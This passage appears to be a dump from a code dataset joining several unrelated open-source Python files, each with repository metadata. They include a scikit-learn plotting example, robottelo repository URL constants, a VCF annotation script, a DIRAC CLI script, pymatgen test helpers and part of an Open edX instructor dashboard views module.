make_plot(7)
##############################################################################
# QuantileTransformer (Gaussian output)
# -------------------------------------
#
# To map to a Gaussian distribution, set the parameter
# ``output_distribution='normal'``.
make_plot(8)
# %%
# Normalizer
# ----------
#
# The :class:`~sklearn.preprocessing.Normalizer` rescales the vector for each
# sample to have unit norm,
# independently of the distribution of the samples. It can be seen on both
# figures below where all samples are mapped onto the unit circle. In our
# example the two selected features have only positive values; therefore the
# transformed data only lie in the positive quadrant. This would not be the
# case if some original features had a mix of positive and negative values.
make_plot(9)
plt.show()
|
glemaitre/scikit-learn
|
examples/preprocessing/plot_all_scaling.py
|
Python
|
bsd-3-clause
| 13,721
|
[
"Gaussian"
] |
ade3c8dfc63f2ffaa974036ef80a82d8d900574fc44b590a6d616615096c6e70
|
"""Only External Repos url specific constants module"""
CUSTOM_FILE_REPO = 'https://fixtures.pulpproject.org/file/'
CUSTOM_KICKSTART_REPO = 'http://ftp.cvut.cz/centos/8/BaseOS/x86_64/kickstart/'
CUSTOM_RPM_REPO = 'https://fixtures.pulpproject.org/rpm-signed/'
CUSTOM_RPM_SHA_512 = 'https://fixtures.pulpproject.org/rpm-with-sha-512/'
FAKE_5_YUM_REPO = 'https://rplevka.fedorapeople.org/fakerepo01/'
FAKE_YUM_DRPM_REPO = 'https://fixtures.pulpproject.org/drpm-signed/'
FAKE_YUM_SRPM_REPO = 'https://fixtures.pulpproject.org/srpm-signed/'
FAKE_YUM_SRPM_DUPLICATE_REPO = 'https://fixtures.pulpproject.org/srpm-duplicate/'
FAKE_YUM_MD5_REPO = 'https://fixtures.pulpproject.org/rpm-with-md5/'
# Fedora's OSTree repo changed to a single repo at
# https://kojipkgs.fedoraproject.org/compose/ostree/repo/
# With branches for each version. Some tests (test_positive_update_url) still need 2 repos URLs,
# We will use the archived versions for now, but probably need to revisit this.
FEDORA26_OSTREE_REPO = 'https://kojipkgs.fedoraproject.org/compose/ostree-20190207-old/26/'
FEDORA27_OSTREE_REPO = 'https://kojipkgs.fedoraproject.org/compose/ostree-20190207-old/26/'
OSTREE_REPO = 'https://fixtures.pulpproject.org/ostree/small/'
FAKE_0_YUM_REPO_STRING_BASED_VERSIONS = (
'https://fixtures.pulpproject.org/rpm-string-version-updateinfo/'
)
ANSIBLE_GALAXY = 'https://galaxy.ansible.com/'
ANSIBLE_HUB = 'https://cloud.redhat.com/api/automation-hub/'
|
SatelliteQE/robottelo
|
robottelo/constants/repos.py
|
Python
|
gpl-3.0
| 1,448
|
[
"Galaxy"
] |
756aedeb5cbe79fb858e2737f0911f4b2597eee2328a4b53939c1d1de843a6ea
|
#!/usr/bin/env python
import sys
import argparse
import multiprocessing
import logging
import vcf
import random
import math
import pysam
def annotate_vcfs(bam, chromosomes, vcfs):
func_logger = logging.getLogger("%s-%s" % (annotate_vcfs.__name__, multiprocessing.current_process()))
random.seed(0)
# Load indexed BAM file
sam_file = pysam.Samfile(bam.name, "rb")
if not chromosomes:
func_logger.info("Chromosome list unspecified. Inferring from the BAMs")
chromosomes += list(sam_file.references)
chromosomes = sorted(list(set(chromosomes)))
func_logger.info("Chromosome list inferred as %s" % (str(chromosomes)))
if not chromosomes or len(chromosomes) == 0:
func_logger.error("Chromosome list empty")
return None
# Read through samfile and get some statistics
# hard code this for now
read_limit = 1000
# this is temporary, needs to read the reference to be sensible
# TODODODODODO!!!
num_read = 0.0
cover_sum = 0.0
template_list = list()
first_chr = sam_file.getrname(0)
for i in xrange(0, read_limit):
loc = random.randint(0, 30000000)
alignments = sam_file.fetch(first_chr, loc, loc + 1)
curr_num = 0
for aln in alignments:
if aln.mapq < 18:
continue
curr_num += 1
cover_sum += 1
template_list.append(abs(aln.tlen))
if curr_num > 0:
num_read += 1
template_list.sort()
num_template = float(len(template_list))
low_bound = int(math.floor(num_template * 0.05))
upp_bound = int(math.ceil(num_template * 0.95))
insert_count = 0
insert_sum = 0.0
insert_sq_sum = 0.0
for i in xrange(low_bound, upp_bound):
insert_count += 1
insert_sum += template_list[i]
insert_sq_sum += template_list[i] * template_list[i]
mean_coverage = cover_sum / num_read
mean_insert_size = insert_sum / insert_count
sd_insert_size = math.sqrt((insert_sq_sum / insert_count) - (mean_insert_size * mean_insert_size))
func_logger.info("Estimated coverage mean: {0:.2f}".format(mean_coverage))
func_logger.info("Estimated template size mean: {0:.2f}".format(mean_insert_size))
func_logger.info("Estimated template size sd: {0:.2f}".format(sd_insert_size))
func_logger.info("Estimated template size Q5: {0:.2f}".format(template_list[low_bound]))
func_logger.info("Estimated template size Q95: {0:.2f}".format(template_list[upp_bound - 1]))
template_upper_bound = mean_insert_size + (3 * sd_insert_size)
template_lower_bound = mean_insert_size - (3 * sd_insert_size)
# Read though VCF one line at a time
for inVCF in vcfs:
vcf_reader = vcf.Reader(open(inVCF.name))
vcf_template_reader = vcf.Reader(open(inVCF.name))
vcf_writer = vcf.Writer(open("anno_" + inVCF.name, 'w'), vcf_template_reader)
num_processed = 0
for vcf_record in vcf_reader:
if vcf_record.CHROM not in chromosomes:
continue
num_processed += 1
if num_processed % 100 == 0:
func_logger.info("{0} read from {1}".format(num_processed, inVCF.name))
# get the interval that corresponds to the SV
if vcf_record.INFO['SVTYPE'] == 'INS':
breakpoints = (vcf_record.start, vcf_record.start + 1)
else:
if 'END' in vcf_record.INFO:
breakpoints = (vcf_record.start, vcf_record.INFO['END'])
else:
breakpoints = (vcf_record.start, vcf_record.start + abs(int(vcf_record.INFO['SVLEN'][0])))
process_variant = True
if breakpoints[1] - breakpoints[0] > 1000000:
process_variant = False
if process_variant:
# get reads between breakpoints
# sample with replacement 100 points
unique_coverage = 0.0
total_coverage = 0.0
num_forward = 0.0
bases_aligned = 0.0
total_bases = 0.0
end_bases_aligned = 0.0
end_total_bases = 0.0
num_discordant_high = 0.0
num_discordant_low = 0.0
num_repeat = 10
for i in xrange(0, num_repeat):
loc = random.randint(breakpoints[0], breakpoints[1])
alignments = sam_file.fetch(vcf_record.CHROM, loc, loc + 1)
for rec in alignments:
if rec.mapq >= 18:
unique_coverage += 1
if not rec.is_reverse:
num_forward += 1
total_bases += rec.rlen
bases_aligned += rec.qlen
total_coverage += 1
# compute number of discordant
for loc in [max(breakpoints[0] - sd_insert_size, 0), breakpoints[1] + sd_insert_size]:
alignments = sam_file.fetch(vcf_record.CHROM, loc, loc + 1)
for rec in alignments:
if rec.mapq >= 18:
if abs(rec.tlen) > template_upper_bound:
num_discordant_high += 1
if abs(rec.tlen) < template_lower_bound:
num_discordant_low += 1
end_total_bases += rec.rlen
end_bases_aligned += rec.qlen
# get coverage between the breakpoints
vcf_record.INFO["AA_UNIQ_COV"] = (unique_coverage / num_repeat) / mean_coverage
vcf_record.INFO["AA_TOTAL_COV"] = (total_coverage / num_repeat) / mean_coverage
# get strand bias
if unique_coverage > 0.0:
vcf_record.INFO["AA_TOTAL_STRAND"] = (num_forward / unique_coverage - 0.5) ** 2
# get mapping quality stats
if total_coverage > 0.0:
vcf_record.INFO["AA_PROP_REPEAT"] = unique_coverage / total_coverage
# get clipped reads stats
if total_bases > 0.0:
vcf_record.INFO["AA_PROP_ALIGNED"] = bases_aligned / total_bases
if end_total_bases > 0.0:
vcf_record.INFO["AA_END_PROP_ALIGNED"] = end_bases_aligned / end_total_bases
# get discordant reads stats
vcf_record.INFO["AA_DISCORDANT_HIGH"] = num_discordant_high
vcf_record.INFO["AA_DISCORDANT_LOW"] = num_discordant_low
# get supplementary alignment stats
# Skip this for now
vcf_writer.write_record(vcf_record)
vcf_writer.close()
if __name__ == "__main__":
FORMAT = '%(levelname)s %(asctime)-15s %(name)-20s %(message)s'
logging.basicConfig(level=logging.INFO, format=FORMAT)
logger = logging.getLogger(__name__)
parser = argparse.ArgumentParser(
description="Annotate VCF with additional useful features",
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument("--bam", help="BAM file", required=True, type=file)
parser.add_argument("--chromosomes", nargs="+", help="Chromosomes", default=[])
parser.add_argument("--vcfs", nargs="+", help="Input VCF files", type=file)
args = parser.parse_args()
logger.info("Command-line: " + " ".join(sys.argv))
annotate_vcfs(args.bam, args.chromosomes, args.vcfs)
logger.info("All done!")
|
msahraeian/metasv
|
scripts/annotate_vcf_bam.py
|
Python
|
bsd-2-clause
| 7,661
|
[
"pysam"
] |
33ec9b34a23d8f60e149ae1090109bc95628ae7049d55cea7f3e038cba4c6cb4
|
#!/usr/bin/env python
########################################################################
# File : dirac-wms-job-parameters
# Author : Stuart Paterson
########################################################################
"""
Retrieve parameters associated to the given DIRAC job
"""
from __future__ import print_function
__RCSID__ = "$Id$"
import DIRAC
from DIRAC import gLogger
from DIRAC.Core.Base import Script
Script.setUsageMessage('\n'.join([__doc__.split('\n')[1],
'Usage:',
' %s [option|cfgfile] ... JobID ...' % Script.scriptName,
'Arguments:',
' JobID: DIRAC Job ID']))
Script.parseCommandLine(ignoreErrors=True)
args = Script.getPositionalArgs()
if len(args) < 1:
Script.showHelp()
from DIRAC.Interfaces.API.Dirac import Dirac, parseArguments
dirac = Dirac()
exitCode = 0
errorList = []
for job in parseArguments(args):
result = dirac.getJobParameters(job, printOutput=True)
if not result['OK']:
errorList.append((job, result['Message']))
exitCode = 2
else:
gLogger.notice(result['Value'])
for error in errorList:
print("ERROR %s: %s" % error)
DIRAC.exit(exitCode)
|
fstagni/DIRAC
|
Interfaces/scripts/dirac-wms-job-parameters.py
|
Python
|
gpl-3.0
| 1,263
|
[
"DIRAC"
] |
df33b76db2e7bd11e1b49d48e8c54c02df7fe23057a2c1db2fc9dbbd9b7f0e38
|
# coding: utf-8
# Copyright (c) Pymatgen Development Team.
# Distributed under the terms of the MIT License.
"""
Common test support for pymatgen test scripts.
This single module should provide all the common functionality for pymatgen
tests in a single location, so that test scripts can just import it and work
right away.
"""
import unittest
import tempfile
import numpy.testing as nptu
from io import open
from pathlib import Path
import json
from monty.json import MontyDecoder
from monty.serialization import loadfn
from monty.json import MSONable
from monty.dev import requires
from pymatgen import SETTINGS, MPRester
class PymatgenTest(unittest.TestCase):
"""
Extends unittest.TestCase with functions (taken from numpy.testing.utils)
that support the comparison of arrays.
"""
_multiprocess_shared_ = True
MODULE_DIR = Path(__file__).absolute().parent
STRUCTURES_DIR = MODULE_DIR / "structures"
TEST_FILES_DIR = MODULE_DIR / ".." / ".." / "test_files"
"""
Dict for test structures to aid testing.
"""
TEST_STRUCTURES = {}
for fn in STRUCTURES_DIR.iterdir():
TEST_STRUCTURES[fn.name.rsplit(".", 1)[0]] = loadfn(str(fn))
@classmethod
def get_structure(cls, name):
"""
Get a structure from the template directories.
:param name: Name of a structure.
:return: Structure
"""
return cls.TEST_STRUCTURES[name].copy()
@classmethod
@requires(SETTINGS.get("PMG_MAPI_KEY"), "PMG_MAPI_KEY needs to be set.")
def get_mp_structure(cls, mpid):
"""
Get a structure from MP.
:param mpid: Materials Project id.
:return: Structure
"""
m = MPRester()
return m.get_structure_by_material_id(mpid)
@staticmethod
def assertArrayAlmostEqual(actual, desired, decimal=7, err_msg='',
verbose=True):
"""
Tests if two arrays are almost equal to a tolerance. The CamelCase
naming is so that it is consistent with standard unittest methods.
"""
return nptu.assert_almost_equal(actual, desired, decimal, err_msg,
verbose)
@staticmethod
def assertDictsAlmostEqual(actual, desired, decimal=7, err_msg='',
verbose=True):
"""
Tests if two arrays are almost equal to a tolerance. The CamelCase
naming is so that it is consistent with standard unittest methods.
"""
for k, v in actual.items():
if k not in desired:
return False
v2 = desired[k]
if isinstance(v, dict):
pass_test = PymatgenTest.assertDictArraysAlmostEqual(
v, v2, decimal=decimal, err_msg=err_msg, verbose=verbose)
if not pass_test:
return False
elif isinstance(v, (list, tuple)):
pass_test = nptu.assert_almost_equal(v, v2, decimal, err_msg,
verbose)
if not pass_test:
return False
elif isinstance(v, (int, float)):
pass_test = PymatgenTest.assertAlmostEqual(v, v2)
if not pass_test:
return False
else:
assert v == v2
return True
@staticmethod
def assertArrayEqual(actual, desired, err_msg='', verbose=True):
"""
Tests if two arrays are equal. The CamelCase naming is so that it is
consistent with standard unittest methods.
"""
return nptu.assert_equal(actual, desired, err_msg=err_msg,
verbose=verbose)
@staticmethod
def assertStrContentEqual(actual, desired, err_msg='', verbose=True):
"""
Tests if two strings are equal, ignoring things like trailing spaces,
etc.
"""
lines1 = actual.split("\n")
lines2 = desired.split("\n")
if len(lines1) != len(lines2):
return False
failed = []
for l1, l2 in zip(lines1, lines2):
if l1.strip() != l2.strip():
failed.append("%s != %s" % (l1, l2))
return len(failed) == 0
def serialize_with_pickle(self, objects, protocols=None, test_eq=True):
"""
Test whether the object(s) can be serialized and deserialized with
pickle. This method tries to serialize the objects with pickle and the
protocols specified in input. Then it deserializes the pickle format
and compares the two objects with the __eq__ operator if
test_eq == True.
Args:
objects: Object or list of objects.
protocols: List of pickle protocols to test. If protocols is None,
HIGHEST_PROTOCOL is tested.
Returns:
Nested list with the objects deserialized with the specified
protocols.
"""
# Use the python version so that we get the traceback in case of errors
import pickle as pickle
from pymatgen.util.serialization import pmg_pickle_load, \
pmg_pickle_dump
# Build a list even when we receive a single object.
got_single_object = False
if not isinstance(objects, (list, tuple)):
got_single_object = True
objects = [objects]
if protocols is None:
# protocols = set([0, 1, 2] + [pickle.HIGHEST_PROTOCOL])
protocols = [pickle.HIGHEST_PROTOCOL]
# This list will contains the object deserialized with the different
# protocols.
objects_by_protocol, errors = [], []
for protocol in protocols:
# Serialize and deserialize the object.
mode = "wb"
fd, tmpfile = tempfile.mkstemp(text="b" not in mode)
try:
with open(tmpfile, mode) as fh:
pmg_pickle_dump(objects, fh, protocol=protocol)
except Exception as exc:
errors.append("pickle.dump with protocol %s raised:\n%s" %
(protocol, str(exc)))
continue
try:
with open(tmpfile, "rb") as fh:
new_objects = pmg_pickle_load(fh)
except Exception as exc:
errors.append("pickle.load with protocol %s raised:\n%s" %
(protocol, str(exc)))
continue
# Test for equality
if test_eq:
for old_obj, new_obj in zip(objects, new_objects):
self.assertEqual(old_obj, new_obj)
# Save the deserialized objects and test for equality.
objects_by_protocol.append(new_objects)
if errors:
raise ValueError("\n".join(errors))
# Return nested list so that client code can perform additional tests.
if got_single_object:
return [o[0] for o in objects_by_protocol]
else:
return objects_by_protocol
def tmpfile_write(self, string):
"""
Write string to a temporary file. Returns the name of the temporary
file.
"""
fd, tmpfile = tempfile.mkstemp(text=True)
with open(tmpfile, "w") as fh:
fh.write(string)
return tmpfile
def assertMSONable(self, obj, test_if_subclass=True):
"""
Tests if obj is MSONable and tries to verify whether the contract is
fulfilled.
By default, the method tests whether obj is an instance of MSONable.
This check can be deactivated by setting test_if_subclass to False.
"""
if test_if_subclass:
self.assertIsInstance(obj, MSONable)
self.assertDictEqual(obj.as_dict(), obj.__class__.from_dict(
obj.as_dict()).as_dict())
json.loads(obj.to_json(), cls=MontyDecoder)
|
mbkumar/pymatgen
|
pymatgen/util/testing.py
|
Python
|
mit
| 7,992
|
[
"pymatgen"
] |
6ac0cd7723fc49021e4ec5490b3a7663be33d1487e47a1ebe1aae0c59682593e
|
"""
Instructor Dashboard Views
"""
import datetime
import logging
import uuid
from urlparse import urljoin
import pytz
from django.conf import settings
from django.contrib.auth.decorators import login_required
from django.urls import reverse
from django.http import Http404, HttpResponseServerError
from django.utils.html import escape
from django.utils.translation import ugettext as _
from django.utils.translation import ugettext_noop
from django.views.decorators.cache import cache_control
from django.views.decorators.csrf import ensure_csrf_cookie
from django.views.decorators.http import require_POST
from mock import patch
from opaque_keys import InvalidKeyError
from opaque_keys.edx.keys import CourseKey
from six import text_type
from xblock.field_data import DictFieldData
from xblock.fields import ScopeIds
from bulk_email.models import BulkEmailFlag
from lms.djangoapps.certificates import api as certs_api
from lms.djangoapps.certificates.models import (
CertificateGenerationConfiguration,
CertificateGenerationHistory,
CertificateInvalidation,
CertificateStatuses,
CertificateWhitelist,
GeneratedCertificate
)
from class_dashboard.dashboard_data import get_array_section_has_problem, get_section_display_name
from course_modes.models import CourseMode, CourseModesArchive
from courseware.access import has_access
from courseware.courses import get_course_by_id, get_studio_url
from django_comment_client.utils import available_division_schemes, has_forum_access
from django_comment_common.models import FORUM_ROLE_ADMINISTRATOR, CourseDiscussionSettings
from edxmako.shortcuts import render_to_response
from lms.djangoapps.courseware.module_render import get_module_by_usage_id
from lms.djangoapps.grades.config.waffle import waffle_flags, WRITABLE_GRADEBOOK
from openedx.core.djangoapps.course_groups.cohorts import DEFAULT_COHORT_NAME, get_course_cohorts, is_course_cohorted
from openedx.core.djangoapps.site_configuration import helpers as configuration_helpers
from openedx.core.djangoapps.verified_track_content.models import VerifiedTrackCohortedCourse
from openedx.core.djangolib.markup import HTML, Text
from openedx.core.lib.url_utils import quote_slashes
from openedx.core.lib.xblock_utils import wrap_xblock
from shoppingcart.models import Coupon, CourseRegCodeItem, PaidCourseRegistration
from student.models import CourseEnrollment
from student.roles import CourseFinanceAdminRole, CourseSalesAdminRole, CourseStaffRole, CourseInstructorRole
from util.json_request import JsonResponse
from xmodule.html_module import HtmlDescriptor
from xmodule.modulestore.django import modulestore
from xmodule.tabs import CourseTab
from .tools import get_units_with_due_date, title_or_url
log = logging.getLogger(__name__)
class InstructorDashboardTab(CourseTab):
"""
Defines the Instructor Dashboard view type that is shown as a course tab.
"""
type = "instructor"
title = ugettext_noop('Instructor')
view_name = "instructor_dashboard"
is_dynamic = True # The "Instructor" tab is instead dynamically added when it is enabled
@classmethod
def is_enabled(cls, course, user=None):
"""
Returns true if the specified user has staff access.
"""
return bool(user and has_access(user, 'staff', course, course.id))
def show_analytics_dashboard_message(course_key):
"""
Defines whether or not the analytics dashboard URL should be displayed.
Arguments:
course_key (CourseLocator): The course locator to display the analytics dashboard message on.
"""
if hasattr(course_key, 'ccx'):
ccx_analytics_enabled = settings.FEATURES.get('ENABLE_CCX_ANALYTICS_DASHBOARD_URL', False)
return settings.ANALYTICS_DASHBOARD_URL and ccx_analytics_enabled
return settings.ANALYTICS_DASHBOARD_URL
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
def instructor_dashboard_2(request, course_id):
""" Display the instructor dashboard for a course. """
try:
course_key = CourseKey.from_string(course_id)
except InvalidKeyError:
log.error(u"Unable to find course with course key %s while loading the Instructor Dashboard.", course_id)
return HttpResponseServerError()
course = get_course_by_id(course_key, depth=0)
access = {
'admin': request.user.is_staff,
'instructor': bool(has_access(request.user, 'instructor', course)),
'finance_admin': CourseFinanceAdminRole(course_key).has_user(request.user),
'sales_admin': CourseSalesAdminRole(course_key).has_user(request.user),
'staff': bool(has_access(request.user, 'staff', course)),
'forum_admin': has_forum_access(request.user, course_key, FORUM_ROLE_ADMINISTRATOR),
}
if not access['staff']:
raise Http404()
is_white_label = CourseMode.is_white_label(course_key)
reports_enabled = configuration_helpers.get_value('SHOW_ECOMMERCE_REPORTS', False)
sections = [
_section_course_info(course, access),
_section_membership(course, access),
_section_cohort_management(course, access),
_section_discussions_management(course, access),
_section_student_admin(course, access),
_section_data_download(course, access),
]
analytics_dashboard_message = None
if show_analytics_dashboard_message(course_key):
# Construct a URL to the external analytics dashboard
analytics_dashboard_url = '{0}/courses/{1}'.format(settings.ANALYTICS_DASHBOARD_URL, unicode(course_key))
link_start = HTML("<a href=\"{}\" target=\"_blank\">").format(analytics_dashboard_url)
analytics_dashboard_message = _(
"To gain insights into student enrollment and participation {link_start}"
"visit {analytics_dashboard_name}, our new course analytics product{link_end}."
)
analytics_dashboard_message = Text(analytics_dashboard_message).format(
link_start=link_start, link_end=HTML("</a>"), analytics_dashboard_name=settings.ANALYTICS_DASHBOARD_NAME)
# Temporarily show the "Analytics" section until we have a better way of linking to Insights
sections.append(_section_analytics(course, access))
# Check if there is corresponding entry in the CourseMode Table related to the Instructor Dashboard course
course_mode_has_price = False
paid_modes = CourseMode.paid_modes_for_course(course_key)
if len(paid_modes) == 1:
course_mode_has_price = True
elif len(paid_modes) > 1:
log.error(
u"Course %s has %s course modes with payment options. Course must only have "
u"one paid course mode to enable eCommerce options.",
unicode(course_key), len(paid_modes)
)
if settings.FEATURES.get('INDIVIDUAL_DUE_DATES') and access['instructor']:
sections.insert(3, _section_extensions(course))
# Gate access to course email by feature flag & by course-specific authorization
if BulkEmailFlag.feature_enabled(course_key):
sections.append(_section_send_email(course, access))
# Gate access to Metrics tab by featue flag and staff authorization
if settings.FEATURES['CLASS_DASHBOARD'] and access['staff']:
sections.append(_section_metrics(course, access))
# Gate access to Ecommerce tab
if course_mode_has_price and (access['finance_admin'] or access['sales_admin']):
sections.append(_section_e_commerce(course, access, paid_modes[0], is_white_label, reports_enabled))
# Gate access to Special Exam tab depending if either timed exams or proctored exams
# are enabled in the course
user_has_access = any([
request.user.is_staff,
CourseStaffRole(course_key).has_user(request.user),
CourseInstructorRole(course_key).has_user(request.user)
])
course_has_special_exams = course.enable_proctored_exams or course.enable_timed_exams
can_see_special_exams = course_has_special_exams and user_has_access and settings.FEATURES.get(
'ENABLE_SPECIAL_EXAMS', False)
if can_see_special_exams:
sections.append(_section_special_exams(course, access))
# Certificates panel
# This is used to generate example certificates
# and enable self-generated certificates for a course.
# Note: This is hidden for all CCXs
certs_enabled = CertificateGenerationConfiguration.current().enabled and not hasattr(course_key, 'ccx')
if certs_enabled and access['admin']:
sections.append(_section_certificates(course))
openassessment_blocks = modulestore().get_items(
course_key, qualifiers={'category': 'openassessment'}
)
# filter out orphaned openassessment blocks
openassessment_blocks = [
block for block in openassessment_blocks if block.parent is not None
]
# TODO: Uncomment this code after upgrading ora2
# if len(openassessment_blocks) > 0:
# sections.append(_section_open_response_assessment(request, course, openassessment_blocks, access))
disable_buttons = not _is_small_course(course_key)
certificate_white_list = CertificateWhitelist.get_certificate_white_list(course_key)
generate_certificate_exceptions_url = reverse(
'generate_certificate_exceptions',
kwargs={'course_id': unicode(course_key), 'generate_for': ''}
)
generate_bulk_certificate_exceptions_url = reverse(
'generate_bulk_certificate_exceptions',
kwargs={'course_id': unicode(course_key)}
)
certificate_exception_view_url = reverse(
'certificate_exception_view',
kwargs={'course_id': unicode(course_key)}
)
certificate_invalidation_view_url = reverse(
'certificate_invalidation_view',
kwargs={'course_id': unicode(course_key)}
)
certificate_invalidations = CertificateInvalidation.get_certificate_invalidations(course_key)
context = {
'course': course,
'studio_url': get_studio_url(course, 'course'),
'sections': sections,
'disable_buttons': disable_buttons,
'analytics_dashboard_message': analytics_dashboard_message,
'certificate_white_list': certificate_white_list,
'certificate_invalidations': certificate_invalidations,
'generate_certificate_exceptions_url': generate_certificate_exceptions_url,
'generate_bulk_certificate_exceptions_url': generate_bulk_certificate_exceptions_url,
'certificate_exception_view_url': certificate_exception_view_url,
'certificate_invalidation_view_url': certificate_invalidation_view_url,
}
return render_to_response('instructor/instructor_dashboard_2/instructor_dashboard_2.html', context)
## Section functions starting with _section return a dictionary of section data.
## The dictionary must include at least {
## 'section_key': 'circus_expo'
## 'section_display_name': 'Circus Expo'
## }
## section_key will be used as a css attribute, javascript tie-in, and template import filename.
## section_display_name will be used to generate link titles in the nav bar.
def _section_e_commerce(course, access, paid_mode, coupons_enabled, reports_enabled):
""" Provide data for the corresponding dashboard section """
course_key = course.id
coupons = Coupon.objects.filter(course_id=course_key).order_by('-is_active')
course_price = paid_mode.min_price
total_amount = None
if access['finance_admin']:
single_purchase_total = PaidCourseRegistration.get_total_amount_of_purchased_item(course_key)
bulk_purchase_total = CourseRegCodeItem.get_total_amount_of_purchased_item(course_key)
total_amount = single_purchase_total + bulk_purchase_total
section_data = {
'section_key': 'e-commerce',
'section_display_name': _('E-Commerce'),
'access': access,
'course_id': unicode(course_key),
'currency_symbol': settings.PAID_COURSE_REGISTRATION_CURRENCY[1],
'ajax_remove_coupon_url': reverse('remove_coupon', kwargs={'course_id': unicode(course_key)}),
'ajax_get_coupon_info': reverse('get_coupon_info', kwargs={'course_id': unicode(course_key)}),
'get_user_invoice_preference_url': reverse('get_user_invoice_preference', kwargs={'course_id': unicode(course_key)}),
'sale_validation_url': reverse('sale_validation', kwargs={'course_id': unicode(course_key)}),
'ajax_update_coupon': reverse('update_coupon', kwargs={'course_id': unicode(course_key)}),
'ajax_add_coupon': reverse('add_coupon', kwargs={'course_id': unicode(course_key)}),
'get_sale_records_url': reverse('get_sale_records', kwargs={'course_id': unicode(course_key)}),
'get_sale_order_records_url': reverse('get_sale_order_records', kwargs={'course_id': unicode(course_key)}),
'instructor_url': reverse('instructor_dashboard', kwargs={'course_id': unicode(course_key)}),
'get_registration_code_csv_url': reverse('get_registration_codes', kwargs={'course_id': unicode(course_key)}),
'generate_registration_code_csv_url': reverse('generate_registration_codes', kwargs={'course_id': unicode(course_key)}),
'active_registration_code_csv_url': reverse('active_registration_codes', kwargs={'course_id': unicode(course_key)}),
'spent_registration_code_csv_url': reverse('spent_registration_codes', kwargs={'course_id': unicode(course_key)}),
'set_course_mode_url': reverse('set_course_mode_price', kwargs={'course_id': unicode(course_key)}),
'download_coupon_codes_url': reverse('get_coupon_codes', kwargs={'course_id': unicode(course_key)}),
'enrollment_report_url': reverse('get_enrollment_report', kwargs={'course_id': unicode(course_key)}),
'exec_summary_report_url': reverse('get_exec_summary_report', kwargs={'course_id': unicode(course_key)}),
'list_financial_report_downloads_url': reverse('list_financial_report_downloads',
kwargs={'course_id': unicode(course_key)}),
'list_instructor_tasks_url': reverse('list_instructor_tasks', kwargs={'course_id': unicode(course_key)}),
'look_up_registration_code': reverse('look_up_registration_code', kwargs={'course_id': unicode(course_key)}),
'coupons': coupons,
'sales_admin': access['sales_admin'],
'coupons_enabled': coupons_enabled,
'reports_enabled': reports_enabled,
'course_price': course_price,
'total_amount': total_amount,
'is_ecommerce_course': is_ecommerce_course(course_key)
}
return section_data
def _section_special_exams(course, access):
""" Provide data for the corresponding dashboard section """
course_key = unicode(course.id)
from edx_proctoring.api import is_backend_dashboard_available
section_data = {
'section_key': 'special_exams',
'section_display_name': _('Special Exams'),
'access': access,
'course_id': course_key,
'show_dashboard': is_backend_dashboard_available(course_key),
}
return section_data
def _section_certificates(course):
"""Section information for the certificates panel.
The certificates panel allows global staff to generate
example certificates and enable self-generated certificates
for a course.
Arguments:
course (Course)
Returns:
dict
"""
example_cert_status = None
html_cert_enabled = certs_api.has_html_certificates_enabled(course)
if html_cert_enabled:
can_enable_for_course = True
else:
example_cert_status = certs_api.example_certificates_status(course.id)
# Allow the user to enable self-generated certificates for students
# *only* once a set of example certificates has been successfully generated.
# If certificates have been misconfigured for the course (for example, if
# the PDF template hasn't been uploaded yet), then we don't want
# to turn on self-generated certificates for students!
can_enable_for_course = (
example_cert_status is not None and
all(
cert_status['status'] == 'success'
for cert_status in example_cert_status
)
)
instructor_generation_enabled = settings.FEATURES.get('CERTIFICATES_INSTRUCTOR_GENERATION', False)
certificate_statuses_with_count = {
certificate['status']: certificate['count']
for certificate in GeneratedCertificate.get_unique_statuses(course_key=course.id)
}
return {
'section_key': 'certificates',
'section_display_name': _('Certificates'),
'example_certificate_status': example_cert_status,
'can_enable_for_course': can_enable_for_course,
'enabled_for_course': certs_api.cert_generation_enabled(course.id),
'is_self_paced': course.self_paced,
'instructor_generation_enabled': instructor_generation_enabled,
'html_cert_enabled': html_cert_enabled,
'active_certificate': certs_api.get_active_web_certificate(course),
'certificate_statuses_with_count': certificate_statuses_with_count,
'status': CertificateStatuses,
'certificate_generation_history':
CertificateGenerationHistory.objects.filter(course_id=course.id).order_by("-created"),
'urls': {
'generate_example_certificates': reverse(
'generate_example_certificates',
kwargs={'course_id': course.id}
),
'enable_certificate_generation': reverse(
'enable_certificate_generation',
kwargs={'course_id': course.id}
),
'start_certificate_generation': reverse(
'start_certificate_generation',
kwargs={'course_id': course.id}
),
'start_certificate_regeneration': reverse(
'start_certificate_regeneration',
kwargs={'course_id': course.id}
),
'list_instructor_tasks_url': reverse(
'list_instructor_tasks',
kwargs={'course_id': course.id}
),
}
}
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_POST
@login_required
def set_course_mode_price(request, course_id):
"""
set the new course price and add new entry in the CourseModesArchive Table
"""
try:
course_price = int(request.POST['course_price'])
except ValueError:
return JsonResponse(
{'message': _("Please Enter the numeric value for the course price")},
status=400) # status code 400: Bad Request
currency = request.POST['currency']
course_key = CourseKey.from_string(course_id)
course_honor_mode = CourseMode.objects.filter(mode_slug='honor', course_id=course_key)
if not course_honor_mode:
return JsonResponse(
{'message': _("CourseMode with the mode slug({mode_slug}) DoesNotExist").format(mode_slug='honor')},
status=400) # status code 400: Bad Request
CourseModesArchive.objects.create(
course_id=course_id, mode_slug='honor', mode_display_name='Honor Code Certificate',
min_price=course_honor_mode[0].min_price, currency=course_honor_mode[0].currency,
expiration_datetime=datetime.datetime.now(pytz.utc), expiration_date=datetime.date.today()
)
course_honor_mode.update(
min_price=course_price,
currency=currency
)
return JsonResponse({'message': _("CourseMode price updated successfully")})
def _section_course_info(course, access):
""" Provide data for the corresponding dashboard section """
course_key = course.id
section_data = {
'section_key': 'course_info',
'section_display_name': _('Course Info'),
'access': access,
'course_id': course_key,
'course_display_name': course.display_name_with_default,
'course_org': course.display_org_with_default,
'course_number': course.display_number_with_default,
'has_started': course.has_started(),
'has_ended': course.has_ended(),
'start_date': course.start,
'end_date': course.end,
'num_sections': len(course.children),
'list_instructor_tasks_url': reverse('list_instructor_tasks', kwargs={'course_id': unicode(course_key)}),
}
if settings.FEATURES.get('DISPLAY_ANALYTICS_ENROLLMENTS'):
section_data['enrollment_count'] = CourseEnrollment.objects.enrollment_counts(course_key)
if show_analytics_dashboard_message(course_key):
# dashboard_link is already made safe in _get_dashboard_link
dashboard_link = _get_dashboard_link(course_key)
# so we can use Text() here so it's not double-escaped and rendering HTML on the front-end
